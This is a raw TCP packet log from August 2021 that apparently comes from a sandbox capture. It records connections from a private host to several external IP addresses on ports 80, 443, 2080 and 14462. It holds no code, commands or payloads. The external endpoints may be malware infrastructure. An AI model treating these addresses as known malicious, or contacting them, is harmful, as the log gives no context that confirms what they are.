Aug 24, 2021 08:49:28.258661032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258683920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258704901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258718014 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258727074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258749962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258789062 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258795977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.633219004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.633250952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.657814980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.682420969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.691448927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.691479921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.714644909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.748506069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.845273018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.845427990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.870671988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.898721933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:28.999334097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:28.999741077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:29.022423029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:29.051706076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:29.122525930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:29.367022038 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:29.370851994 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:29.422786951 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:32.936043024 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:32.936141014 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:32.947001934 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:32.970448971 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:34.521409988 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:34.609510899 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:34.609549999 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:34.609620094 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:34.609648943 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:34.732013941 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:34.809952021 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:34.912086964 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:36.114648104 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:36.136600018 CEST	80	49721	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:36.136754990 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:36.138014078 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:36.138118029 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:36.160038948 CEST	80	49721	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:36.160073042 CEST	80	49721	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:36.182436943 CEST	80	49721	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:36.232203007 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:39.051722050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:39.053481102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:39.094723940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:39.116983891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:40.517106056 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:40.517201900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:40.538369894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:40.666610003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:40.667072058 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:46.182732105 CEST	80	49721	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:46.182842970 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:50.617868900 CEST	49721	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:58.590152979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:50:07.680062056 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.700360060 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.700464010 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.704864025 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.725121021 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.726742983 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.726762056 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.726778984 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.726792097 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.726830959 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.726897955 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.736341000 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.757644892 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.813013077 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.920378923 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:07.977595091 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.986829996 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.986854076 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.986874104 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.986891985 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:50:07.986969948 CEST	49727	443	192.168.2.5	195.201.225.248
Aug 24, 2021 08:50:15.283158064 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.308108091 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.308366060 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.384516001 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.384542942 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.408907890 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.408931017 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.660162926 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.660196066 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.660213947 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.660224915 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.660269976 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.660298109 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.660461903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.726234913 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.751668930 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964029074 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964054108 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964123011 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.964160919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964243889 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964276075 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964296103 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964301109 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.964315891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964339018 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964339018 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.964358091 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964371920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.964402914 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.964422941 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.990180016 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990200043 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990226030 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990246058 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990262032 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990274906 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990284920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.990294933 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.990334034 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.991533995 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.991566896 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.991580009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.991591930 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.991611958 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.991641998 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.995450020 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995469093 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995482922 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995501995 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995507956 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995521069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995542049 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.995574951 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.995619059 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.995709896 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:15.997390032 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.997399092 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:15.997505903 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.016551971 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.016583920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.016597033 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.016609907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.016618967 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.016669989 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.016705990 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.019709110 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019730091 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019742966 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019759893 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019769907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019783020 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019797087 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.019825935 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.019869089 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.020076036 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020085096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020107031 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020137072 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020148039 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.020155907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020169973 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020183086 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.020236969 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.020245075 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.021141052 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021162987 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021205902 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021222115 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.021229029 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021241903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021255016 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021255970 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.021290064 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.021434069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.021713018 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042182922 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042216063 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042228937 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042347908 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042787075 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042802095 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042826891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042845011 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042876005 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042877913 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042879105 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042882919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042896986 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042907000 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042908907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042922974 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042948008 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042965889 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042973042 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.042979956 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.042999029 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043013096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043029070 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043030977 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.043044090 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043055058 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.043061018 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043073893 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043076992 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.043087959 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043098927 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043133974 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.043144941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.043153048 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.043210030 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.045458078 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.048988104 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049005032 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049072027 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049082994 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049091101 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.049132109 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.049758911 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049774885 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049810886 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049820900 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049840927 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.049841881 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049855947 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049860001 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.049889088 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049889088 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.049897909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.049937963 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.050242901 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050257921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050298929 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050308943 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050312996 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.050345898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.050952911 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050976038 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.050988913 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.051007986 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.051021099 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.051031113 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.051037073 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.051045895 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.051057100 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.051132917 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.052206993 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.052386999 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.052403927 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.052426100 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.052439928 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.052455902 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.052458048 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.052498102 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.066853046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.066874981 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.066917896 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.066929102 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067048073 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067089081 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067229986 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067245960 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067270994 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067286015 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067297935 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067306995 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067320108 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067352057 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067464113 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067477942 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067523003 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067528009 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067538023 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067586899 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067601919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067622900 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067631006 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067636967 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067645073 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067688942 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067694902 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067709923 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067732096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067748070 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067755938 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067765951 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067778111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067786932 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.067794085 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067806959 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.067825079 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.068638086 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.070892096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.070905924 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.070982933 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.079325914 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.079346895 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.079387903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.079499960 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.079617023 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.081867933 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.081882000 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.081989050 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.082427979 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082442999 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082465887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082480907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082518101 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.082768917 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082783937 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082807064 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082822084 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.082844973 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.082880974 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.083077908 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.083136082 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.083159924 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.083184958 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.083190918 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.083245993 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.085963011 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.087196112 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.087765932 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.087781906 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.087800026 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.087805033 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.087860107 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.087924004 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.089484930 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.103982925 CEST	80	49766	188.119.112.104	192.168.2.5
